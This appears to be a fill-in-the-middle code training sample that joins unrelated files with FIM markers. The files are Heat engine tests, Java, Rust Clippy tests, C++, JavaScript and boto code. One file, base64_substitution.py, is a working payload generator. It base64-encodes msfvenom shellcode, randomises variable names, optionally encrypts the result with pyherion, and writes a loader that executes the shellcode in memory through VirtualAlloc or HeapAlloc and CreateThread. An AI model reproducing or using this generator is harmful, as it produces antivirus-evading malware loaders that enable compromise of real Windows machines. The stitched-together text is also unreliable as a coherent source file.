self.assertIsNone(stk._dependencies)
resources = stk.resources
self.assertIsInstance(resources, dict)
self.assertEqual(2, len(resources))
self.assertIsInstance(resources.get('foo'),
generic_rsrc.GenericResource)
self.assertIsInstance(resources.get('bar'),
generic_rsrc.ResourceWithProps)
stack_dependencies = stk.dependencies
self.assertIsInstance(stack_dependencies, dependencies.Dependencies)
self.assertEqual(2, len(stack_dependencies.graph()))
@tools.stack_context('service_mark_healthy_create_complete_test_stk')
def test_mark_healthy_in_create_complete(self):
self.eng.resource_mark_unhealthy(self.ctx, self.stack.identifier(),
'WebServer', False,
resource_status_reason='noop')
r = self.eng.describe_stack_resource(self.ctx, self.stack.identifier(),
'WebServer', with_attr=None)
self.assertIn('resource_action', r)
self.assertIn('resource_status', r)
self.assertIn('resource_status_reason', r)
self.assertEqual(r['resource_action'], 'CREATE')
self.assertEqual(r['resource_status'], 'COMPLETE')
self.assertEqual(r['resource_status_reason'], 'state changed')
@tools.stack_context('service_mark_unhealthy_create_complete_test_stk')
def test_mark_unhealthy_in_create_complete(self):
self.eng.resource_mark_unhealthy(self.ctx, self.stack.identifier(),
'WebServer', True,
resource_status_reason='Some Reason')
r = self.eng.describe_stack_resource(self.ctx, self.stack.identifier(),
'WebServer', with_attr=None)
self.assertEqual(r['resource_action'], 'CHECK')
self.assertEqual(r['resource_status'], 'FAILED')
self.assertEqual(r['resource_status_reason'], 'Some Reason')
@tools.stack_context('service_mark_healthy_check_failed_test_stk')
def test_mark_healthy_check_failed(self):
self.eng.resource_mark_unhealthy(self.ctx, self.stack.identifier(),
'WebServer', True,
resource_status_reason='Some Reason')
r = self.eng.describe_stack_resource(self.ctx, self.stack.identifier(),
'WebServer', with_attr=None)
self.assertEqual(r['resource_action'], 'CHECK')
self.assertEqual(r['resource_status'], 'FAILED')
self.assertEqual(r['resource_status_reason'], 'Some Reason')
self.eng.resource_mark_unhealthy(self.ctx, self.stack.identifier(),
'WebServer', False,
resource_status_reason='Good Reason')
r = self.eng.describe_stack_resource(self.ctx, self.stack.identifier(),
'WebServer', with_attr=None)
self.assertEqual(r['resource_action'], 'CHECK')
self.assertEqual(r['resource_status'], 'COMPLETE')
self.assertEqual(r['resource_status_reason'], 'Good Reason')
@tools.stack_context('service_mark_unhealthy_check_failed_test_stack')
def test_mark_unhealthy_check_failed(self):
self.eng.resource_mark_unhealthy(self.ctx, self.stack.identifier(),
'WebServer', True,
resource_status_reason='Some Reason')
r = self.eng.describe_stack_resource(self.ctx, self.stack.identifier(),
'WebServer', with_attr=None)
self.assertEqual(r['resource_action'], 'CHECK')
self.assertEqual(r['resource_status'], 'FAILED')
self.assertEqual(r['resource_status_reason'], 'Some Reason')
self.eng.resource_mark_unhealthy(self.ctx, self.stack.identifier(),
'WebServer', True,
resource_status_reason='New Reason')
r = self.eng.describe_stack_resource(self.ctx, self.stack.identifier(),
'WebServer', with_attr=None)
self.assertEqual(r['resource_action'], 'CHECK')
self.assertEqual(r['resource_status'], 'FAILED')
self.assertEqual(r['resource_status_reason'], 'New Reason')
@tools.stack_context('service_mark_unhealthy_invalid_value_test_stk')
def test_mark_unhealthy_invalid_value(self):
ex = self.assertRaises(dispatcher.ExpectedException,
self.eng.resource_mark_unhealthy,
self.ctx,
self.stack.identifier(),
'WebServer', "This is wrong",
resource_status_reason="Some Reason")
self.assertEqual(exception.Invalid, ex.exc_info[0])
@tools.stack_context('service_mark_unhealthy_none_reason_test_stk')
def test_mark_unhealthy_none_reason(self):
self.eng.resource_mark_unhealthy(self.ctx, self.stack.identifier(),
'WebServer', True)
r = self.eng.describe_stack_resource(self.ctx, self.stack.identifier(),
'WebServer', with_attr=None)
self.assertEqual(r['resource_action'], 'CHECK')
self.assertEqual(r['resource_status'], 'FAILED')
self.assertEqual(r['resource_status_reason'],
'state changed by resource_mark_unhealthy api')
@tools.stack_context('service_mark_unhealthy_empty_reason_test_stk')
def test_mark_unhealthy_empty_reason(self):
self.eng.resource_mark_unhealthy(self.ctx, self.stack.identifier(),
'WebServer', True,
resource_status_reason="")
r = self.eng.describe_stack_resource(self.ctx, self.stack.identifier(),
'WebServer', with_attr=None)
self.assertEqual(r['resource_action'], 'CHECK')
self.assertEqual(r['resource_status'], 'FAILED')
self.assertEqual(r['resource_status_reason'],
'state changed by resource_mark_unhealthy api')
@tools.stack_context('service_mark_unhealthy_lock_no_converge_test_stk')
def test_mark_unhealthy_lock_no_convergence(self):
mock_acquire = self.patchobject(stack_lock.StackLock,
'acquire',
return_value=None)
mock_release = self.patchobject(stack_lock.StackLock,
'release',
return_value=None)
self.eng.resource_mark_unhealthy(self.ctx, self.stack.identifier(),
'WebServer', True,
resource_status_reason="")
mock_acquire.assert_called_once_with()
mock_release.assert_called_once_with()
@tools.stack_context('service_mark_unhealthy_lock_converge_test_stk',
convergence=True)
def test_mark_unhealthy_stack_lock_convergence(self):
mock_acquire = self.patchobject(res.Resource,
'_acquire',
return_value=None)
self.eng.resource_mark_unhealthy(self.ctx, self.stack.identifier(),
'WebServer', True,
resource_status_reason="")
mock_acquire.assert_called_once_with(self.eng.engine_id)
@tools.stack_context('service_mark_unhealthy_lockexc_converge_test_stk',
convergence=True)
def test_mark_unhealthy_stack_lock_exc_convergence(self):
def _acquire(*args, **kwargs):
raise exception.UpdateInProgress(self.stack.name)
self.patchobject(
res.Resource,
'_acquire',
return_value=None,
side_effect=exception.UpdateInProgress(self.stack.name))
ex = self.assertRaises(dispatcher.ExpectedException,
self.eng.resource_mark_unhealthy,
self.ctx,
self.stack.identifier(),
'WebServer', True,
resource_status_reason="")
self.assertEqual(exception.ActionInProgress, ex.exc_info[0])
@tools.stack_context('service_mark_unhealthy_lockexc_no_converge_test_stk')
def test_mark_unhealthy_stack_lock_exc_no_convergence(self):
self.patchobject(
stack_lock.StackLock,
'acquire',
return_value=None,
side_effect=exception.ActionInProgress(
stack_name=self.stack.name,
action=self.stack.action))
ex = self.assertRaises(dispatcher.ExpectedException,
self.eng.resource_mark_unhealthy,
self.ctx,
self.stack.identifier(),
'WebServer', True,
resource_status_reason="")
self.assertEqual(exception.ActionInProgress, ex.exc_info[0])<|fim▁end|>
|
@mock.patch.object(res.Resource, 'metadata_update')
@mock.patch.object(res.Resource, 'signal')
@mock.patch.object(service.EngineService, '_get_stack')
|
<|file_name|>AddInformationsAboutModules.java<|end_file_name|><|fim▁begin|>/*
* Copyright (C) 2016 robert
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>.
*/
package pl.rcebula.code_generation.final_steps;
import java.util.ArrayList;
import java.util.List;
import pl.rcebula.code_generation.intermediate.intermediate_code_structure.IField;
import pl.rcebula.code_generation.intermediate.intermediate_code_structure.IntermediateCode;
import pl.rcebula.code_generation.intermediate.intermediate_code_structure.Line;
import pl.rcebula.code_generation.intermediate.intermediate_code_structure.StringField;
/**
*
* @author robert
*/
public class AddInformationsAboutModules
{
private final IntermediateCode ic;
private final List<String> modulesName;
public AddInformationsAboutModules(IntermediateCode ic, List<String> modulesName)
{
this.ic = ic;
this.modulesName = modulesName;
analyse();
}
private void analyse()
{
// tworzymy pola
List<IField> fields = new ArrayList<>();
<|fim▁hole|> }
// wstawiamy pustą linię na początek
ic.insertLine(Line.generateEmptyStringLine(), 0);
// tworzymy linię i wstawiamy na początek
Line line = new Line(fields);
ic.insertLine(line, 0);
}
}<|fim▁end|>
|
for (String m : modulesName)
{
IField f = new StringField(m);
fields.add(f);
|
<|file_name|>ParsedTagInfo.java<|end_file_name|><|fim▁begin|>/*
* Copyright (C) 2010 The Android Open Source Project
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package com.google.doclava;
import java.util.ArrayList;
public class ParsedTagInfo extends TagInfo {
private ContainerInfo mContainer;
private String mCommentText;
private Comment mComment;
ParsedTagInfo(String name, String kind, String text, ContainerInfo base, SourcePositionInfo sp) {
super(name, kind, text, SourcePositionInfo.findBeginning(sp, text));
mContainer = base;
mCommentText = text;
}
public TagInfo[] commentTags() {
if (mComment == null) {
mComment = new Comment(mCommentText, mContainer, position());
}
return mComment.tags();
}
protected void setCommentText(String comment) {
mCommentText = comment;
}
public static <T extends ParsedTagInfo> TagInfo[] joinTags(T[] tags) {
ArrayList<TagInfo> list = new ArrayList<TagInfo>();
final int N = tags.length;
for (int i = 0; i < N; i++) {
TagInfo[] t = tags[i].commentTags();
final int M = t.length;
for (int j = 0; j < M; j++) {<|fim▁hole|> return list.toArray(new TagInfo[list.size()]);
}
}<|fim▁end|>
|
list.add(t[j]);
}
}
|
<|file_name|>needless_return.rs<|end_file_name|><|fim▁begin|>// run-rustfix
#![feature(let_else)]
#![allow(unused)]
#![allow(
clippy::if_same_then_else,
clippy::single_match,
clippy::needless_bool,
clippy::equatable_if_let
)]
#![warn(clippy::needless_return)]
macro_rules! the_answer {
() => {
42
};
}
fn test_end_of_fn() -> bool {
if true {
// no error!
return true;
}
return true;
}
fn test_no_semicolon() -> bool {
return true;
}
fn test_if_block() -> bool {
if true {
return true;
} else {
return false;
}
}
fn test_match(x: bool) -> bool {
match x {
true => return false,
false => {
return true;
},
}
}
fn test_closure() {
let _ = || {
return true;
};
let _ = || return true;
}
fn test_macro_call() -> i32 {
return the_answer!();
}
fn test_void_fun() {
return;
}
fn test_void_if_fun(b: bool) {
if b {
return;
} else {
return;
}
}
fn test_void_match(x: u32) {
match x {
0 => (),
_ => return,
}
}
fn read_line() -> String {
use std::io::BufRead;
let stdin = ::std::io::stdin();
return stdin.lock().lines().next().unwrap().unwrap();
}
fn borrows_but_not_last(value: bool) -> String {
if value {
use std::io::BufRead;
let stdin = ::std::io::stdin();
let _a = stdin.lock().lines().next().unwrap().unwrap();
return String::from("test");
} else {
return String::new();
}
}
macro_rules! needed_return {
($e:expr) => {
if $e > 3 {
return;
}
};
}
fn test_return_in_macro() {
// This will return and the macro below won't be executed. Removing the `return` from the macro
// will change semantics.
needed_return!(10);
needed_return!(0);
}
mod issue6501 {
fn foo(bar: Result<(), ()>) {
bar.unwrap_or_else(|_| return)
}
fn test_closure() {
let _ = || {
return;
};
let _ = || return;
}
struct Foo;
#[allow(clippy::unnecessary_lazy_evaluations)]
fn bar(res: Result<Foo, u8>) -> Foo {
res.unwrap_or_else(|_| return Foo)
}
}
async fn async_test_end_of_fn() -> bool {
if true {
// no error!
return true;
}
return true;
}
async fn async_test_no_semicolon() -> bool {
return true;
}
async fn async_test_if_block() -> bool {
if true {
return true;
} else {
return false;
}
}
async fn async_test_match(x: bool) -> bool {
match x {
true => return false,
false => {
return true;
},
}
}
async fn async_test_closure() {
let _ = || {
return true;
};
let _ = || return true;
}
async fn async_test_macro_call() -> i32 {
return the_answer!();
}
async fn async_test_void_fun() {
return;
}
async fn async_test_void_if_fun(b: bool) {
if b {
return;
} else {
return;
}
}
async fn async_test_void_match(x: u32) {
match x {
0 => (),
_ => return,
}
}
<|fim▁hole|> use std::io::BufRead;
let stdin = ::std::io::stdin();
return stdin.lock().lines().next().unwrap().unwrap();
}
async fn async_borrows_but_not_last(value: bool) -> String {
if value {
use std::io::BufRead;
let stdin = ::std::io::stdin();
let _a = stdin.lock().lines().next().unwrap().unwrap();
return String::from("test");
} else {
return String::new();
}
}
async fn async_test_return_in_macro() {
needed_return!(10);
needed_return!(0);
}
fn let_else() {
let Some(1) = Some(1) else { return };
}
fn main() {}<|fim▁end|>
|
async fn async_read_line() -> String {
|
<|file_name|>base64_substitution.py<|end_file_name|><|fim▁begin|>"""
This payload receives the msfvenom shellcode, base64 encodes it, and stores it within the payload.
At runtime, the executable decodes the shellcode and executes it in memory.
module by @christruncer
"""
import base64
from datetime import date
from datetime import timedelta
from modules.common import shellcode<|fim▁hole|>
class Payload:
def __init__(self):
# required options
self.description = "Base64 encoded shellcode is decoded at runtime and executed in memory"
self.language = "python"
self.extension = "py"
self.rating = "Excellent"
self.shellcode = shellcode.Shellcode()
# options we require user interaction for- format is {OPTION : [Value, Description]]}
self.required_options = {
"COMPILE_TO_EXE" : ["Y", "Compile to an executable"],
"USE_PYHERION" : ["N", "Use the pyherion encrypter"],
"INJECT_METHOD" : ["Virtual", "Virtual, Void, Heap"],
"EXPIRE_PAYLOAD" : ["X", "Optional: Payloads expire after \"Y\" days (\"X\" disables feature)"]
}
def generate(self):
if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
if self.required_options["EXPIRE_PAYLOAD"][0].lower() == "x":
# Generate Shellcode Using msfvenom
Shellcode = self.shellcode.generate(self.required_options)
# Base64 Encode Shellcode
EncodedShellcode = base64.b64encode(Shellcode)
# Generate Random Variable Names
ShellcodeVariableName = helpers.randomString()
RandPtr = helpers.randomString()
RandBuf = helpers.randomString()
RandHt = helpers.randomString()
RandT = helpers.randomString()
randctypes = helpers.randomString()
PayloadCode = 'import ctypes as ' + randctypes + '\n'
PayloadCode += 'import base64\n'
PayloadCode += RandT + " = \"" + EncodedShellcode + "\"\n"
PayloadCode += ShellcodeVariableName + " = bytearray(" + RandT + ".decode('base64','strict').decode(\"string_escape\"))\n"
PayloadCode += RandPtr + ' = ' + randctypes + '.windll.kernel32.VirtualAlloc(' + randctypes + '.c_int(0),' + randctypes + '.c_int(len(' + ShellcodeVariableName + ')),' + randctypes + '.c_int(0x3000),' + randctypes + '.c_int(0x40))\n'
PayloadCode += RandBuf + ' = (' + randctypes + '.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n'
PayloadCode += randctypes + '.windll.kernel32.RtlMoveMemory(' + randctypes + '.c_int(' + RandPtr + '),' + RandBuf + ',' + randctypes + '.c_int(len(' + ShellcodeVariableName + ')))\n'
PayloadCode += RandHt + ' = ' + randctypes + '.windll.kernel32.CreateThread(' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.c_int(' + RandPtr + '),' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.pointer(' + randctypes + '.c_int(0)))\n'
PayloadCode += randctypes + '.windll.kernel32.WaitForSingleObject(' + randctypes + '.c_int(' + RandHt + '),' + randctypes + '.c_int(-1))\n'
if self.required_options["USE_PYHERION"][0].lower() == "y":
PayloadCode = encryption.pyherion(PayloadCode)
return PayloadCode
else:
# Get our current date and add number of days to the date
todaysdate = date.today()
expiredate = str(todaysdate + timedelta(days=int(self.required_options["EXPIRE_PAYLOAD"][0])))
# Generate Shellcode Using msfvenom
Shellcode = self.shellcode.generate(self.required_options)
# Base64 Encode Shellcode
EncodedShellcode = base64.b64encode(Shellcode)
# Generate Random Variable Names
ShellcodeVariableName = helpers.randomString()
RandPtr = helpers.randomString()
RandBuf = helpers.randomString()
RandHt = helpers.randomString()
RandT = helpers.randomString()
RandToday = helpers.randomString()
RandExpire = helpers.randomString()
randctypes = helpers.randomString()
PayloadCode = 'import ctypes as ' + randctypes + '\n'
PayloadCode += 'import base64\n'
PayloadCode += 'from datetime import datetime\n'
PayloadCode += 'from datetime import date\n\n'
PayloadCode += RandToday + ' = datetime.now()\n'
PayloadCode += RandExpire + ' = datetime.strptime(\"' + expiredate[2:] + '\",\"%y-%m-%d\") \n'
PayloadCode += 'if ' + RandToday + ' < ' + RandExpire + ':\n'
PayloadCode += '\t' + RandT + " = \"" + EncodedShellcode + "\"\n"
PayloadCode += '\t' + ShellcodeVariableName + " = bytearray(" + RandT + ".decode('base64','strict').decode(\"string_escape\"))\n"
PayloadCode += '\t' + RandPtr + ' = ' + randctypes + '.windll.kernel32.VirtualAlloc(' + randctypes + '.c_int(0),' + randctypes + '.c_int(len(' + ShellcodeVariableName + ')),' + randctypes + '.c_int(0x3000),' + randctypes + '.c_int(0x40))\n'
PayloadCode += '\t' + RandBuf + ' = (' + randctypes + '.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n'
PayloadCode += '\t' + randctypes + '.windll.kernel32.RtlMoveMemory(' + randctypes + '.c_int(' + RandPtr + '),' + RandBuf + ',' + randctypes + '.c_int(len(' + ShellcodeVariableName + ')))\n'
PayloadCode += '\t' + RandHt + ' = ' + randctypes + '.windll.kernel32.CreateThread(' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.c_int(' + RandPtr + '),' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.pointer(' + randctypes + '.c_int(0)))\n'
PayloadCode += '\t' + randctypes + '.windll.kernel32.WaitForSingleObject(' + randctypes + '.c_int(' + RandHt + '),' + randctypes + '.c_int(-1))\n'
if self.required_options["USE_PYHERION"][0].lower() == "y":
PayloadCode = encryption.pyherion(PayloadCode)
return PayloadCode
if self.required_options["INJECT_METHOD"][0].lower() == "heap":
if self.required_options["EXPIRE_PAYLOAD"][0].lower() == "x":
# Generate Shellcode Using msfvenom
Shellcode = self.shellcode.generate(self.required_options)
# Base64 Encode Shellcode
EncodedShellcode = base64.b64encode(Shellcode)
# Generate Random Variable Names
ShellcodeVariableName = helpers.randomString()
RandPtr = helpers.randomString()
RandBuf = helpers.randomString()
RandHt = helpers.randomString()
RandT = helpers.randomString()
HeapVar = helpers.randomString()
randctypes = helpers.randomString()
PayloadCode = 'import ctypes as ' + randctypes + '\n'
PayloadCode += 'import base64\n'
PayloadCode += RandT + " = \"" + EncodedShellcode + "\"\n"
PayloadCode += ShellcodeVariableName + " = bytearray(" + RandT + ".decode('base64','strict').decode(\"string_escape\"))\n"
PayloadCode += HeapVar + ' = ' + randctypes + '.windll.kernel32.HeapCreate(' + randctypes + '.c_int(0x00040000),' + randctypes + '.c_int(len(' + ShellcodeVariableName + ') * 2),' + randctypes + '.c_int(0))\n'
PayloadCode += RandPtr + ' = ' + randctypes + '.windll.kernel32.HeapAlloc(' + randctypes + '.c_int(' + HeapVar + '),' + randctypes + '.c_int(0x00000008),' + randctypes + '.c_int(len( ' + ShellcodeVariableName + ')))\n'
PayloadCode += RandBuf + ' = (' + randctypes + '.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n'
PayloadCode += randctypes + '.windll.kernel32.RtlMoveMemory(' + randctypes + '.c_int(' + RandPtr + '),' + RandBuf + ',' + randctypes + '.c_int(len(' + ShellcodeVariableName + ')))\n'
PayloadCode += RandHt + ' = ' + randctypes + '.windll.kernel32.CreateThread(' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.c_int(' + RandPtr + '),' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.pointer(' + randctypes + '.c_int(0)))\n'
PayloadCode += randctypes + '.windll.kernel32.WaitForSingleObject(' + randctypes + '.c_int(' + RandHt + '),' + randctypes + '.c_int(-1))\n'
if self.required_options["USE_PYHERION"][0].lower() == "y":
PayloadCode = encryption.pyherion(PayloadCode)
return PayloadCode
else:
# Get our current date and add number of days to the date
todaysdate = date.today()
expiredate = str(todaysdate + timedelta(days=int(self.required_options["EXPIRE_PAYLOAD"][0])))
# Generate Shellcode Using msfvenom
Shellcode = self.shellcode.generate(self.required_options)
# Base64 Encode Shellcode
EncodedShellcode = base64.b64encode(Shellcode)
# Generate Random Variable Names
ShellcodeVariableName = helpers.randomString()
RandPtr = helpers.randomString()
RandBuf = helpers.randomString()
RandHt = helpers.randomString()
RandT = helpers.randomString()
HeapVar = helpers.randomString()
RandToday = helpers.randomString()
RandExpire = helpers.randomString()
randctypes = helpers.randomString()
PayloadCode = 'import ctypes as ' + randctypes + '\n'
PayloadCode += 'import base64\n'
PayloadCode += 'from datetime import datetime\n'
PayloadCode += 'from datetime import date\n\n'
PayloadCode += RandToday + ' = datetime.now()\n'
PayloadCode += RandExpire + ' = datetime.strptime(\"' + expiredate[2:] + '\",\"%y-%m-%d\") \n'
PayloadCode += 'if ' + RandToday + ' < ' + RandExpire + ':\n'
PayloadCode += '\t' + RandT + " = \"" + EncodedShellcode + "\"\n"
PayloadCode += '\t' + ShellcodeVariableName + " = bytearray(" + RandT + ".decode('base64','strict').decode(\"string_escape\"))\n"
PayloadCode += '\t' + HeapVar + ' = ' + randctypes + '.windll.kernel32.HeapCreate(' + randctypes + '.c_int(0x00040000),' + randctypes + '.c_int(len(' + ShellcodeVariableName + ') * 2),' + randctypes + '.c_int(0))\n'
PayloadCode += '\t' + RandPtr + ' = ' + randctypes + '.windll.kernel32.HeapAlloc(' + randctypes + '.c_int(' + HeapVar + '),' + randctypes + '.c_int(0x00000008),' + randctypes + '.c_int(len( ' + ShellcodeVariableName + ')))\n'
PayloadCode += '\t' + RandBuf + ' = (' + randctypes + '.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n'
PayloadCode += '\t' + randctypes + '.windll.kernel32.RtlMoveMemory(' + randctypes + '.c_int(' + RandPtr + '),' + RandBuf + ',' + randctypes + '.c_int(len(' + ShellcodeVariableName + ')))\n'
PayloadCode += '\t' + RandHt + ' = ' + randctypes + '.windll.kernel32.CreateThread(' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.c_int(' + RandPtr + '),' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.pointer(' + randctypes + '.c_int(0)))\n'
PayloadCode += '\t' + randctypes + '.windll.kernel32.WaitForSingleObject(' + randctypes + '.c_int(' + RandHt + '),' + randctypes + '.c_int(-1))\n'
if self.required_options["USE_PYHERION"][0].lower() == "y":
PayloadCode = encryption.pyherion(PayloadCode)
return PayloadCode
else:
if self.required_options["EXPIRE_PAYLOAD"][0].lower() == "x":
# Generate Shellcode Using msfvenom
Shellcode = self.shellcode.generate(self.required_options)
# Generate Random Variable Names
ShellcodeVariableName = helpers.randomString()
RandShellcode = helpers.randomString()
RandReverseShell = helpers.randomString()
RandMemoryShell = helpers.randomString()
DecodedShellcode = helpers.randomString()
# Base64 Encode Shellcode
EncodedShellcode = base64.b64encode(Shellcode)
PayloadCode = 'from ctypes import *\n'
PayloadCode += 'import base64\n'
PayloadCode += ShellcodeVariableName + " = \"" + EncodedShellcode + "\"\n"
PayloadCode += DecodedShellcode + " = bytearray(" + ShellcodeVariableName + ".decode('base64','strict').decode(\"string_escape\"))\n"
PayloadCode += RandMemoryShell + ' = create_string_buffer(str(' + DecodedShellcode + '), len(str(' + DecodedShellcode + ')))\n'
PayloadCode += RandShellcode + ' = cast(' + RandMemoryShell + ', CFUNCTYPE(c_void_p))\n'
PayloadCode += RandShellcode + '()'
if self.required_options["USE_PYHERION"][0].lower() == "y":
PayloadCode = encryption.pyherion(PayloadCode)
return PayloadCode
else:
# Get our current date and add number of days to the date
todaysdate = date.today()
expiredate = str(todaysdate + timedelta(days=int(self.required_options["EXPIRE_PAYLOAD"][0])))
# Generate Shellcode Using msfvenom
Shellcode = self.shellcode.generate(self.required_options)
# Generate Random Variable Names
ShellcodeVariableName = helpers.randomString()
RandShellcode = helpers.randomString()
RandReverseShell = helpers.randomString()
RandMemoryShell = helpers.randomString()
DecodedShellcode = helpers.randomString()
RandToday = helpers.randomString()
RandExpire = helpers.randomString()
# Base64 Encode Shellcode
EncodedShellcode = base64.b64encode(Shellcode)
PayloadCode = 'from ctypes import *\n'
PayloadCode += 'import base64\n'
PayloadCode += 'from datetime import datetime\n'
PayloadCode += 'from datetime import date\n\n'
PayloadCode += RandToday + ' = datetime.now()\n'
PayloadCode += RandExpire + ' = datetime.strptime(\"' + expiredate[2:] + '\",\"%y-%m-%d\") \n'
PayloadCode += 'if ' + RandToday + ' < ' + RandExpire + ':\n'
PayloadCode += '\t' + ShellcodeVariableName + " = \"" + EncodedShellcode + "\"\n"
PayloadCode += '\t' + DecodedShellcode + " = bytearray(" + ShellcodeVariableName + ".decode('base64','strict').decode(\"string_escape\"))\n"
PayloadCode += '\t' + RandMemoryShell + ' = create_string_buffer(str(' + DecodedShellcode + '), len(str(' + DecodedShellcode + ')))\n'
PayloadCode += '\t' + RandShellcode + ' = cast(' + RandMemoryShell + ', CFUNCTYPE(c_void_p))\n'
PayloadCode += '\t' + RandShellcode + '()'
if self.required_options["USE_PYHERION"][0].lower() == "y":
PayloadCode = encryption.pyherion(PayloadCode)
return PayloadCode<|fim▁end|>
|
from modules.common import helpers
from modules.common import encryption
|
<|file_name|>update_settings_dialog.cc<|end_file_name|><|fim▁begin|>//
// Aspia Project
// Copyright (C) 2018 Dmitry Chapyshev <dmitry@aspia.ru>
//
// This program is free software: you can redistribute it and/or modify
// it under the terms of the GNU General Public License as published by
// the Free Software Foundation, either version 3 of the License, or
// (at your option) any later version.
//
// This program is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
// GNU General Public License for more details.
//
// You should have received a copy of the GNU General Public License
// along with this program. If not, see <https://www.gnu.org/licenses/>.
//
#include "console/update_settings_dialog.h"
#include "build/build_config.h"
#include "console/console_settings.h"
namespace console {
<|fim▁hole|> : QDialog(parent)
{
ui.setupUi(this);
Settings settings;
ui.checkbox_check_updates->setChecked(settings.checkUpdates());
ui.edit_server->setText(settings.updateServer());
if (settings.updateServer() == DEFAULT_UPDATE_SERVER)
{
ui.checkbox_custom_server->setChecked(false);
ui.edit_server->setEnabled(false);
}
else
{
ui.checkbox_custom_server->setChecked(true);
ui.edit_server->setEnabled(true);
}
connect(ui.checkbox_custom_server, &QCheckBox::toggled, [this](bool checked)
{
ui.edit_server->setEnabled(checked);
if (!checked)
ui.edit_server->setText(DEFAULT_UPDATE_SERVER);
});
connect(ui.button_box, &QDialogButtonBox::clicked, [this](QAbstractButton* button)
{
if (ui.button_box->standardButton(button) == QDialogButtonBox::Ok)
{
Settings settings;
settings.setCheckUpdates(ui.checkbox_check_updates->isChecked());
settings.setUpdateServer(ui.edit_server->text());
}
close();
});
}
UpdateSettingsDialog::~UpdateSettingsDialog() = default;
} // namespace console<|fim▁end|>
|
UpdateSettingsDialog::UpdateSettingsDialog(QWidget* parent)
|
<|file_name|>LetterProps.js<|end_file_name|><|fim▁begin|>function LetterProps(o, sw, sc, fc, m, p) {
this.o = o;
this.sw = sw;
this.sc = sc;
this.fc = fc;
this.m = m;
this.p = p;
this._mdf = {
o: true,
sw: !!sw,
sc: !!sc,
fc: !!fc,
m: true,
p: true,
};
}
LetterProps.prototype.update = function (o, sw, sc, fc, m, p) {
this._mdf.o = false;
this._mdf.sw = false;
this._mdf.sc = false;
this._mdf.fc = false;
this._mdf.m = false;
this._mdf.p = false;
var updated = false;
if (this.o !== o) {
this.o = o;
this._mdf.o = true;
updated = true;
}
if (this.sw !== sw) {
this.sw = sw;
this._mdf.sw = true;
updated = true;
}
if (this.sc !== sc) {
this.sc = sc;
this._mdf.sc = true;
updated = true;
}
if (this.fc !== fc) {
this.fc = fc;
this._mdf.fc = true;
updated = true;
}
if (this.m !== m) {
this.m = m;
this._mdf.m = true;
updated = true;
}
if (p.length && (this.p[0] !== p[0] || this.p[1] !== p[1] || this.p[4] !== p[4] || this.p[5] !== p[5] || this.p[12] !== p[12] || this.p[13] !== p[13])) {
this.p = p;
this._mdf.p = true;
updated = true;
}
<|fim▁hole|><|fim▁end|>
|
return updated;
};
|
<|file_name|>layer1.py<|end_file_name|><|fim▁begin|># Copyright (c) 2012 Mitch Garnaat http://garnaat.org/
# Copyright (c) 2012 Amazon.com, Inc. or its affiliates.
# All Rights Reserved
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
#
import boto
import boto.jsonresponse
from boto.compat import json
from boto.regioninfo import RegionInfo
from boto.connection import AWSQueryConnection
class Layer1(AWSQueryConnection):
APIVersion = '2010-12-01'
DefaultRegionName = 'us-east-1'
DefaultRegionEndpoint = 'elasticbeanstalk.us-east-1.amazonaws.com'
def __init__(self, aws_access_key_id=None, aws_secret_access_key=None,
is_secure=True, port=None,
proxy=None, proxy_port=None,
proxy_user=None, proxy_pass=None, debug=0,
https_connection_factory=None, region=None, path='/',
api_version=None, security_token=None, profile_name=None):
if not region:
region = RegionInfo(self, self.DefaultRegionName,
self.DefaultRegionEndpoint)
self.region = region
super(Layer1, self).__init__(aws_access_key_id,
aws_secret_access_key,
is_secure, port, proxy, proxy_port,
proxy_user, proxy_pass,
self.region.endpoint, debug,
